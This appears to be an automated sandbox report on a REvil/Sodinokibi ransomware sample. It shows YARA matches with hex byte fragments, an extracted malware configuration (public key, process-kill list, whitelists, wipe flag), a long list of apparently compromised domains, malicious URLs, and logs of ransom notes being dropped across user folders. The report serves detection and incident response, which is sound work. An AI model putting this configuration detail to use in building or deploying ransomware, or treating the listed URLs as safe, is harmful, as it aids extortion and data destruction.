FC E7 3E E1 B8 1A 43 38 12 C1 56 28 1A 04 C9 22 55 E0 D7 08 BB 9F 0B 1F 1C B9 13 06 35 0x935b:$d9: C2 C1 EE 03 8B 55 08 0B CE 89 4A 4C 8B CF 89 42 48 33 C0 8B 72 30 8B 52 34 C1 E9 0C 0F A4 DF 14 0B C7 C1 E3 14 8B 7D 08 0B CB 89 4F 30 8B CE 89 47 34 33 C0 C1 E1 0C 0F AC D6 14 0B C6 C1 EA 14 ... 0x828b:$d10: 8B F2 8B 43 38 F7 6F 28 03 C8 8B 43 18 13 F2 F7 6F 48 03 C8 8B 43 28 13 F2 F7 6F 38 03 C8 8B 43 40 13 F2 F7 6F 20 0F A4 CE 01 03 C9 03 C8 8B 43 20 13 F2 F7 6F 40 03 C8 8B 43 30 13 F2 F7 6F 30 ... 0x8d54:$d11: 33 45 FC 31 4B 28 8B CB 31 41 2C 8B CE 8B C3 33 48 50 8B C2 33 43 54 33 CF 33 45 FC 89 4B 50 8B CB 89 41 54 8B CE 8B C3 33 48 78 8B C2 33 43 7C 33 CF 33 45 FC 89 4B 78 8B CB 89 41 7C 33 B1 A0 0x91d4:$d12: 52 24 0F A4 FE 0E C1 E9 12 0B C6 C1 E7 0E 8B 75 08 0B CF 89 4E 20 8B CA 89 46 24 33 C0 8B 7E 78 8B 76 7C 0F A4 DA 1B C1 E9 05 0B C2 C1 E3 1B 8B 55 08 0B CB 89 4A 78 8B CF 89 42 7C 33 C0 8B 9A 0x8233:$d13: F2 8B 43 38 F7 6F 20 03 C8 8B 43 40 13 F2 F7 6F 18 03 C8 8B 43 10 13 F2 F7 6F 48 03 C8 8B 43 28 13 F2 F7 6F 30 03 C8 8B 43 20 13 F2 F7 6F 38 03 C8 8B 43 30 13 F2 F7 6F 28 03 C8 8B 43 48 13 F2 0x89a6:$d14: 8B 47 30 13 F2 F7 6F 40 03 C8 13 F2 0F A4 CE 01 89 73 74 03 C9 89 4B 70 8B 47 30 F7 6F 48 8B C8 8B F2 8B 47 38 F7 6F 40 03 C8 13 F2 0F A4 CE 01 89 73 7C 03 C9 89 4B 78 8B 47 38 F7 6F 48 8B C8
0.0.myfile.exe.270000.0.unpack	Windows_Ransomware_Sodinokibi_a282ba44	Identifies SODINOKIBI/REvil ransomware	unknown	0x3e99:$c3: 75 0C 72 D3 33 C0 40 5F 5E 5B 8B E5 5D C3 33 C0 EB F5 55 8B EC 83 0x4a65:$c4: 0C 8B 04 B0 83 78 04 05 75 1C FF 70 08 FF 70 0C FF 75 0C FF 0x5c13:$c5: FB 8B 45 FC 50 8B 08 FF 51 08 5E 8B C7 5F 5B 8B E5 5D C3 55 0x8f7b:$c6: BC 00 00 00 33 D2 8B 4D F4 8B F1 8B 45 F0 0F A4 C1 01 C1 EE 1F 0x957d:$c7: 54 8B CE F7 D1 8B C2 23 4D DC F7 D0 33 4D F4 23 C7 33 45 E8 89 0xa615:$c8: 0C 89 46 0C 85 C0 75 2A 33 C0 EB 6C 8B 46 08 85 C0 74 62 6B
0.0.myfile.exe.270000.0.unpack	REvil	REvil Payload	R3MRUM	0x17540:$RE1: expand 32-byte kexpand 16-byte k 0xbc30:$RE2: sysshadow 0x107f8:$RE2: sysshadow 0x14470:$RE2: sysshadow 0xbc50:$RE3: SCROLLBAR 0x10810:$RE3: SCROLLBAR 0x14488:$RE3: SCROLLBAR 0xbc40:$RE4: msctfime ui 0x10804:$RE4: msctfime ui 0x1447c:$RE4: msctfime ui 0xbc60:$RE5: \BaseNamedObjects\%S 0x1081c:$RE5: \BaseNamedObjects\%S 0x14494:$RE5: \BaseNamedObjects\%S 0x4e1d:$decode: 33 D2 8A 9C 3D FC FE FF FF 8B C7 0F B6 CB F7 75 0C 8B 45 08 0F B6 04 02 03 C6 03 C8 0F B6 F1 8A 84 35 FC FE FF FF 88 84 3D FC FE FF FF 47 88 9C 35 FC FE FF FF 81 FF 00 01 00 00 72 C3
0.0.myfile.exe.270000.0.unpack	Win32_Ransomware_Revil	unknown	ReversingLabs	0x5699:$search_files: 55 8B EC 81 EC 68 02 00 00 53 56 8B 75 08 33 C0 57 8B 7D 0C 8B D8 50 56 89 45 F4 89 5D F0 89 45 F8 89 45 FC FF 57 04 59 59 85 C0 0F 84 AC 01 00 00 8D 45 F0 56 50 E8 B7 02 00 00 53 56 FF 77 0C ... 0x5c26:$remote_connection: 55 8B EC 81 EC 5C 01 00 00 56 57 8D 85 A4 FE FF FF 50 68 90 00 00 00 6A 04 68 E7 04 00 00 68 28 CC 28 00 E8 B5 E5 FF FF 83 C4 14 33 F6 33 C0 66 89 85 34 FF FF FF 8D 85 A4 FE FF FF 56 56 56 56 ... 0x1ca9:$encrypt_files: 55 8B EC 51 83 7D 14 00 53 56 57 BB 00 00 10 00 7F 0A 7C 05 39 5D 10 73 03 8B 5D 10 8B 7D 08 8D 83 58 01 00 00 50 57 E8 9A 38 00 00 59 59 EB 21 E8 AA 1C 00 00 83 F8 08 75 2F 6A 64 E8 6A 20 00 ... 0x5a7a:$enum_resources: 55 8B EC 83 EC 10 8D 45 F8 50 FF 75 0C 6A 00 6A 01 6A 02 FF 15 48 CB 28 00 85 C0 74 07 33 C0 E9 9D 00 00 00 83 4D FC FF B8 00 40 00 00 57 50 89 45 F4 E8 6D D5 FF FF 8B F8 59 85 FF 75 0D FF 75 ...
0.2.myfile.exe.270000.0.unpack	JoeSecurity_Revil	Yara detected Revil	Joe Security
0.2.myfile.exe.270000.0.unpack	Windows_Ransomware_Sodinokibi_83f05fbe	Identifies SODINOKIBI/REvil ransomware	unknown	0x85ab:$d1: 03 C0 01 47 30 11 4F 34 01 57 30 8B 57 78 8B C2 11 77 34 8B 77 7C 8B CE 0F A4 C1 04 C1 E0 04 01 47 28 8B C2 11 4F 2C 8B CE 0F A4 C1 01 03 C0 01 47 28 11 4F 2C 01 57 28 8B 57 70 8B C2 11 77 2C ... 0x17540:$d2: 65 78 70 61 6E 64 20 33 32 2D 62 79 74 65 20 6B 65 78 70 61 6E 64 20 31 36 2D 62 79 74 65 20 6B 0x82e5:$d3: F7 6F 38 03 C8 8B 43 48 13 F2 F7 6F 20 03 C8 8B 43 38 13 F2 F7 6F 30 03 C8 8B 43 40 13 F2 F7 6F 28 03 C8 8B 43 28 13 F2 F7 6F 40 03 C8 8B 45 08 13 F2 89 48 68 89 70 6C 8B 43 38 F7 6F 38 8B C8 ... 0x926a:$d4: 33 C0 8B 5A 68 8B 52 6C 0F A4 FE 08 C1 E9 18 0B C6 C1 E7 08 8B 75 08 0B CF 89 4E 68 8B CA 89 46 6C 33 C0 8B 7E 60 8B 76 64 0F A4 DA 19 C1 E9 07 0B C2 C1 E3 19 8B 55 08 0B CB 89 4A 60 8B CF 89 ... 0x8f8b:$d5: C1 01 C1 EE 1F 0B D1 03 C0 0B F0 8B C2 33 43 24 8B CE 33 4B 20 33 4D E4 33 45 E0 89 4B 20 8B CB 8B 5D E0 89 41 24 8B CE 33 4D E4 8B C2 31 4F 48 33 C3 8B CF 31 41 4C 8B C7 8B CE 33 48 70 8B C2 ... 0x8160:$d6: 8B 43 40 F7 6F 08 03 C8 8B 03 13 F2 F7 6F 48 03 C8 8B 43 48 13 F2 F7 2F 03 C8 8B 43 08 13 F2 F7 6F 40 03 C8 8B 43 30 13 F2 F7 6F 18 03 C8 8B 43 18 13 F2 F7 6F 30 03 C8 8B 43 38 13 F2 F7 6F 10 ... 0x8ef8:$d7: 8B CE 33 4D F8 8B C2 33 C3 31 4F 18 8B CF 31 41 1C 8B C7 8B CE 33 48 40 8B C2 33 4D F8 33 47 44 89 4F 40 33 C3 8B CF 89 41 44 8B C7 8B CE 33 48 68 8B C2 33 47 6C 33 4D F8 33 C3 89 4F 68 8B CF ... 0x1a000:$d8: 36 7D 49 30 85 35 C2 C3 68 60 4B 4B 7A BE 83 53 AB E6 8E 42 F9 C6 62 A5 D0 6A AD C6 F1 7D F6 1D 79 CD 20 FC E7 3E E1 B8 1A 43 38 12 C1 56 28 1A 04 C9 22 55 E0 D7 08 BB 9F 0B 1F 1C B9 13 06 35 0x935b:$d9: C2 C1 EE 03 8B 55 08 0B CE 89 4A 4C 8B CF 89 42 48 33 C0 8B 72 30 8B 52 34 C1 E9 0C 0F A4 DF 14 0B C7 C1 E3 14 8B 7D 08 0B CB 89 4F 30 8B CE 89 47 34 33 C0 C1 E1 0C 0F AC D6 14 0B C6 C1 EA 14 ... 0x828b:$d10: 8B F2 8B 43 38 F7 6F 28 03 C8 8B 43 18 13 F2 F7 6F 48 03 C8 8B 43 28 13 F2 F7 6F 38 03 C8 8B 43 40 13 F2 F7 6F 20 0F A4 CE 01 03 C9 03 C8 8B 43 20 13 F2 F7 6F 40 03 C8 8B 43 30 13 F2 F7 6F 30 ... 0x8d54:$d11: 33 45 FC 31 4B 28 8B CB 31 41 2C 8B CE 8B C3 33 48 50 8B C2 33 43 54 33 CF 33 45 FC 89 4B 50 8B CB 89 41 54 8B CE 8B C3 33 48 78 8B C2 33 43 7C 33 CF 33 45 FC 89 4B 78 8B CB 89 41 7C 33 B1 A0 0x91d4:$d12: 52 24 0F A4 FE 0E C1 E9 12 0B C6 C1 E7 0E 8B 75 08 0B CF 89 4E 20 8B CA 89 46 24 33 C0 8B 7E 78 8B 76 7C 0F A4 DA 1B C1 E9 05 0B C2 C1 E3 1B 8B 55 08 0B CB 89 4A 78 8B CF 89 42 7C 33 C0 8B 9A 0x8233:$d13: F2 8B 43 38 F7 6F 20 03 C8 8B 43 40 13 F2 F7 6F 18 03 C8 8B 43 10 13 F2 F7 6F 48 03 C8 8B 43 28 13 F2 F7 6F 30 03 C8 8B 43 20 13 F2 F7 6F 38 03 C8 8B 43 30 13 F2 F7 6F 28 03 C8 8B 43 48 13 F2 0x89a6:$d14: 8B 47 30 13 F2 F7 6F 40 03 C8 13 F2 0F A4 CE 01 89 73 74 03 C9 89 4B 70 8B 47 30 F7 6F 48 8B C8 8B F2 8B 47 38 F7 6F 40 03 C8 13 F2 0F A4 CE 01 89 73 7C 03 C9 89 4B 78 8B 47 38 F7 6F 48 8B C8
0.2.myfile.exe.270000.0.unpack	Windows_Ransomware_Sodinokibi_a282ba44	Identifies SODINOKIBI/REvil ransomware	unknown	0x3e99:$c3: 75 0C 72 D3 33 C0 40 5F 5E 5B 8B E5 5D C3 33 C0 EB F5 55 8B EC 83 0x4a65:$c4: 0C 8B 04 B0 83 78 04 05 75 1C FF 70 08 FF 70 0C FF 75 0C FF 0x5c13:$c5: FB 8B 45 FC 50 8B 08 FF 51 08 5E 8B C7 5F 5B 8B E5 5D C3 55 0x8f7b:$c6: BC 00 00 00 33 D2 8B 4D F4 8B F1 8B 45 F0 0F A4 C1 01 C1 EE 1F 0x957d:$c7: 54 8B CE F7 D1 8B C2 23 4D DC F7 D0 33 4D F4 23 C7 33 45 E8 89 0xa615:$c8: 0C 89 46 0C 85 C0 75 2A 33 C0 EB 6C 8B 46 08 85 C0 74 62 6B
0.2.myfile.exe.270000.0.unpack	REvil	REvil Payload	R3MRUM	0x17540:$RE1: expand 32-byte kexpand 16-byte k 0xbc30:$RE2: sysshadow 0x107f8:$RE2: sysshadow 0x14470:$RE2: sysshadow 0xbc50:$RE3: SCROLLBAR 0x10810:$RE3: SCROLLBAR 0x14488:$RE3: SCROLLBAR 0xbc40:$RE4: msctfime ui 0x10804:$RE4: msctfime ui 0x1447c:$RE4: msctfime ui 0xbc60:$RE5: \BaseNamedObjects\%S 0x1081c:$RE5: \BaseNamedObjects\%S 0x14494:$RE5: \BaseNamedObjects\%S 0x4e1d:$decode: 33 D2 8A 9C 3D FC FE FF FF 8B C7 0F B6 CB F7 75 0C 8B 45 08 0F B6 04 02 03 C6 03 C8 0F B6 F1 8A 84 35 FC FE FF FF 88 84 3D FC FE FF FF 47 88 9C 35 FC FE FF FF 81 FF 00 01 00 00 72 C3
0.2.myfile.exe.270000.0.unpack	Win32_Ransomware_Revil	unknown	ReversingLabs	0x5699:$search_files: 55 8B EC 81 EC 68 02 00 00 53 56 8B 75 08 33 C0 57 8B 7D 0C 8B D8 50 56 89 45 F4 89 5D F0 89 45 F8 89 45 FC FF 57 04 59 59 85 C0 0F 84 AC 01 00 00 8D 45 F0 56 50 E8 B7 02 00 00 53 56 FF 77 0C ... 0x5c26:$remote_connection: 55 8B EC 81 EC 5C 01 00 00 56 57 8D 85 A4 FE FF FF 50 68 90 00 00 00 6A 04 68 E7 04 00 00 68 28 CC 28 00 E8 B5 E5 FF FF 83 C4 14 33 F6 33 C0 66 89 85 34 FF FF FF 8D 85 A4 FE FF FF 56 56 56 56 ... 0x1ca9:$encrypt_files: 55 8B EC 51 83 7D 14 00 53 56 57 BB 00 00 10 00 7F 0A 7C 05 39 5D 10 73 03 8B 5D 10 8B 7D 08 8D 83 58 01 00 00 50 57 E8 9A 38 00 00 59 59 EB 21 E8 AA 1C 00 00 83 F8 08 75 2F 6A 64 E8 6A 20 00 ... 0x5a7a:$enum_resources: 55 8B EC 83 EC 10 8D 45 F8 50 FF 75 0C 6A 00 6A 01 6A 02 FF 15 48 CB 28 00 85 C0 74 07 33 C0 E9 9D 00 00 00 83 4D FC FF B8 00 40 00 00 57 50 89 45 F4 E8 6D D5 FF FF 8B F8 59 85 FF 75 0D FF 75 ...
Click to see the 5 entries

Sigma Signatures

Spam, unwanted Advertisements and Ransom Demands

Sigma detected: Sodinokibi

Source: Registry Key set

Author: Joe Security: Data: Details: .g165067x37, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\myfile.exe, ProcessId: 7156, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\recfg\rnd_ext

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: myfile.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://www.hostaletdelsindians.es/news/temp/wpuatzictpgv.jpg	Avira URL Cloud: Label: malware
Source: https://hostaletdelsindians.es/news/temp/wpuatzictpgv.jpg	Avira URL Cloud: Label: malware
Source: https://hostaletdelsindians.es:443/news/temp/wpuatzictpgv.jpggx.gifage	Avira URL Cloud: Label: malware
Source: https://bd2fly.com:443/static/game/nkfydhwjjfbipa.jpgicgx.jpgurce0	Avira URL Cloud: Label: malware
Source: https://www.hostaletdelsindians.es/wp-content/plugins/gtranslate/gtranslate-style24.css?ver=6.0.9	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000003.1647623477.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: REvil {"pk": "jD6pLfwUHlEoWBKadlZ4A78CLm8I0UKlzdzW7XautWE=", "pid": "33", "sub": "357", "dbg": false, "fast": true, "wipe": true, "wht": {"fld": ["application data", "tor browser", "windows.old", "appdata", "$windows.~bt", "intel", "perflogs", "program files", "programdata", "boot", "msocache", "program files (x86)", "system volume information", "$windows.~ws", "windows", "mozilla", "google", "$recycle.bin"], "fls": ["desktop.ini", "ntuser.dat", "bootfont.bin", "ntldr", "autorun.inf", "ntuser.ini", "ntuser.dat.log", "bootsect.bak", "thumbs.db", "iconcache.db", "boot.ini"], "ext": ["idx", "hta", "icns", "cmd", "wpx", "msp", "msu", "cab", "diagpkg", "spl", "scr", "dll", "themepack", "bin", "prf", "msc", "nls", "msi", "ps1", "mod", "exe", "bat", "adv", "386", "ico", "theme", "ani", "sys", "diagcab", "deskthemepack", "msstyles", "lock", "diagcfg", "ocx", "hlp", "com", "ics", "lnk", "drv", "shs", "rom", "cur", "rtp", "cpl", "key", "icl", "ldf", "nomedia", "mpa"]}, "wfld": ["backup"], "prc": ["thunderbird.exe", "synctime.exe", "dbsnmp.exe", "encsvc.exe", "isqlplussvc.exe", "ocautoupds.exe", "mydesktopqos.exe", "powerpnt.exe", "mysqld.exe", "mydesktopservice.exe", "outlook.exe", "mysqld_nt.exe", "firefoxconfig.exe", "sqbcoreservice.exe", "steam.exe", "sqlbrowser.exe", "infopath.exe", "thebat.exe", "msaccess.exe", "mysqld_opt.exe", "tbirdconfig.exe", "visio.exe", "msftesql.exe", "excel.exe", "oracle.exe", "mspub.exe", "sqlservr.exe", "agntsvc.exe", "onenote.exe", "winword.exe", "thebat64.exe", "dbeng50.exe", "wordpad.exe", "ocssd.exe", "sqlwriter.exe", "ocomm.exe", "sqlagent.exe", "xfssvccon.exe"], "dmn": "parksideseniorliving.net;90nguyentuan.com;enactusnhlstenden.com;avisioninthedesert.com;lashandbrowenvy.com;satoblog.org;rsidesigns.com;pansionatblago.ru;magrinya.net;baikalflot.ru;bd2fly.com;business-basic.de;afbudsrejserallinclusive.dk;m2graph.fr;stanleyqualitysystems.com;altitudeboise.com;lexced.com;chainofhopeeurope.eu;bayshoreelite.com;mursall.de;amelielecompte.wordpress.com;wribrazil.com;testitjavertailut.net;chomiksy.net;vitoriaecoturismo.com.br;georgemuncey.com;funworx.de;nbva.co.uk;c-sprop.com;relevantonline.eu;abulanov.com;maxcube24.com.ua;kenmccallum.com;stage-infirmier.fr;skoczynski.eu;mieleshopping.it;holocine.de;oscommunity.de;ikadomus.com;bundan.com;davedavisphotos.com;activeterroristwarningcompany.com;hostaletdelsindians.es;almamidwifery.com;innervisions-id.com;gazelle-du-web.com;angelsmirrorus.com;efficiencyconsulting.es;vedsegaard.dk;schroederschoembs.com;welovecustomers.fr;11.in.ua;modamarfil.com;look.academy;rhino-storage.co.uk;solutionshosting.co.uk;vdolg24.online;azerbaycanas.com;racefietsenblog.nl;photographycreativity.co.uk;crestgood.com;voetbalhoogeveen.nl;suitesartemis.gr;bodymindchallenger.com;test-teleachat.fr;sjtpo.org;patassociation.com;iron-mine.ru;deduktia.fi;ntinasfiloxenia.gr;banukumbak.com;forextimes.ru;rattanwarehouse.co.uk;mslp.org;wineandgo.hu;happycatering.de;dogsunlimitedguide.com;rubyaudiology.com;bridalcave.com;
Source: 0.0.myfile.exe.270000.0.unpack	Malware Configuration Extractor: Sodinokibi {"pk": "jD6pLfwUHlEoWBKadlZ4A78CLm8I0UKlzdzW7XautWE=", "pid": "33", "sub": "357", "dbg": false, "fast": true, "wipe": true, "wht": {"fld": ["application data", "tor browser", "windows.old", "appdata", "$windows.~bt", "intel", "perflogs", "program files", "programdata", "boot", "msocache", "program files (x86)", "system volume information", "$windows.~ws", "windows", "mozilla", "google", "$recycle.bin"], "fls": ["desktop.ini", "ntuser.dat", "bootfont.bin", "ntldr", "autorun.inf", "ntuser.ini", "ntuser.dat.log", "bootsect.bak", "thumbs.db", "iconcache.db", "boot.ini"], "ext": ["idx", "hta", "icns", "cmd", "wpx", "msp", "msu", "cab", "diagpkg", "spl", "scr", "dll", "themepack", "bin", "prf", "msc", "nls", "msi", "ps1", "mod", "exe", "bat", "adv", "386", "ico", "theme", "ani", "sys", "diagcab", "deskthemepack", "msstyles", "lock", "diagcfg", "ocx", "hlp", "com", "ics", "lnk", "drv", "shs", "rom", "cur", "rtp", "cpl", "key", "icl", "ldf", "nomedia", "mpa"]}, "wfld": ["backup"], "prc": ["thunderbird.exe", "synctime.exe", "dbsnmp.exe", "encsvc.exe", "isqlplussvc.exe", "ocautoupds.exe", "mydesktopqos.exe", "powerpnt.exe", "mysqld.exe", "mydesktopservice.exe", "outlook.exe", "mysqld_nt.exe", "firefoxconfig.exe", "sqbcoreservice.exe", "steam.exe", "sqlbrowser.exe", "infopath.exe", "thebat.exe", "msaccess.exe", "mysqld_opt.exe", "tbirdconfig.exe", "visio.exe", "msftesql.exe", "excel.exe", "oracle.exe", "mspub.exe", "sqlservr.exe", "agntsvc.exe", "onenote.exe", "winword.exe", "thebat64.exe", "dbeng50.exe", "wordpad.exe", "ocssd.exe", "sqlwriter.exe", "ocomm.exe", "sqlagent.exe", "xfssvccon.exe"], "dmn": "parksideseniorliving.net;90nguyentuan.com;enactusnhlstenden.com;avisioninthedesert.com;lashandbrowenvy.com;satoblog.org;rsidesigns.com;pansionatblago.ru;magrinya.net;baikalflot.ru;bd2fly.com;business-basic.de;afbudsrejserallinclusive.dk;m2graph.fr;stanleyqualitysystems.com;altitudeboise.com;lexced.com;chainofhopeeurope.eu;bayshoreelite.com;mursall.de;amelielecompte.wordpress.com;wribrazil.com;testitjavertailut.net;chomiksy.net;vitoriaecoturismo.com.br;georgemuncey.com;funworx.de;nbva.co.uk;c-sprop.com;relevantonline.eu;abulanov.com;maxcube24.com.ua;kenmccallum.com;stage-infirmier.fr;skoczynski.eu;mieleshopping.it;holocine.de;oscommunity.de;ikadomus.com;bundan.com;davedavisphotos.com;activeterroristwarningcompany.com;hostaletdelsindians.es;almamidwifery.com;innervisions-id.com;gazelle-du-web.com;angelsmirrorus.com;efficiencyconsulting.es;vedsegaard.dk;schroederschoembs.com;welovecustomers.fr;11.in.ua;modamarfil.com;look.academy;rhino-storage.co.uk;solutionshosting.co.uk;vdolg24.online;azerbaycanas.com;racefietsenblog.nl;photographycreativity.co.uk;crestgood.com;voetbalhoogeveen.nl;suitesartemis.gr;bodymindchallenger.com;test-teleachat.fr;sjtpo.org;patassociation.com;iron-mine.ru;deduktia.fi;ntinasfiloxenia.gr;banukumbak.com;forextimes.ru;rattanwarehouse.co.uk;mslp.org;wineandgo.hu;happycatering.de;dogsunlimitedguide.com;rubyaudiology.com;bridalcave

Multi AV Scanner detection for domain / URL

Source: maxcube24.com.ua	Virustotal: Detection: 6%	Perma Link
Source: stanleyqualitysystems.com	Virustotal: Detection: 5%	Perma Link
Source: holocine.de	Virustotal: Detection: 5%	Perma Link

Multi AV Scanner detection for submitted file

Source: myfile.exe	Virustotal: Detection: 90%			Perma Link
Source: myfile.exe	ReversingLabs: Detection: 97%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.9% probability

Machine Learning detection for sample

Source: myfile.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\myfile.exe	Code function: 0_2_00274CFF CryptStringToBinaryW,CryptStringToBinaryW,	0_2_00274CFF
Source: C:\Users\user\Desktop\myfile.exe	Code function: 0_2_002746DF CryptAcquireContextW,CryptGenRandom,	0_2_002746DF
Source: C:\Users\user\Desktop\myfile.exe	Code function: 0_2_00274D60 CryptBinaryToStringW,CryptBinaryToStringW,	0_2_00274D60

Source: myfile.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\myfile.exe	Directory created: c:\program files\g165067x37-readme.txt			Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Directory created: c:\program files\8c3ea92d.lock			Jump to behavior

Source: C:\Users\user\Desktop\myfile.exe	File created: C:\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\$winreagent\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\program files\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\program files (x86)\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\recovery\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\$winreagent\scratch\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\default\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\public\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\default\desktop\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\default\documents\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\default\downloads\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\default\favorites\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\default\links\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\default\music\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\default\onedrive\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\default\pictures\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\default\saved games\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\default\videos\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\.ms-ad\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\3d objects\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\contacts\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\desktop\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\documents\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\downloads\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\favorites\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\links\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\music\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\onedrive\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\pictures\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\recent\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\saved games\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\searches\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\videos\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\public\accountpictures\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\public\desktop\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\public\documents\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\public\downloads\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\public\libraries\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\public\music\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\public\pictures\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\public\videos\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\desktop\dtbzgiooso\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\desktop\dvwhkmnfnn\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\desktop\htagvdfuie\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\desktop\jsdngycowy\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\desktop\nikhqaiqau\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\desktop\onbqclyspu\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\desktop\sqrkhnbnyn\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\desktop\wkxewiotxi\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\desktop\xzxhavgrag\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\documents\dtbzgiooso\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\documents\dvwhkmnfnn\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\documents\htagvdfuie\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\documents\jsdngycowy\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\documents\nikhqaiqau\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\documents\onbqclyspu\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\documents\sqrkhnbnyn\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\documents\wkxewiotxi\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\documents\xzxhavgrag\g165067x37-readme.txt	Jump to behavior
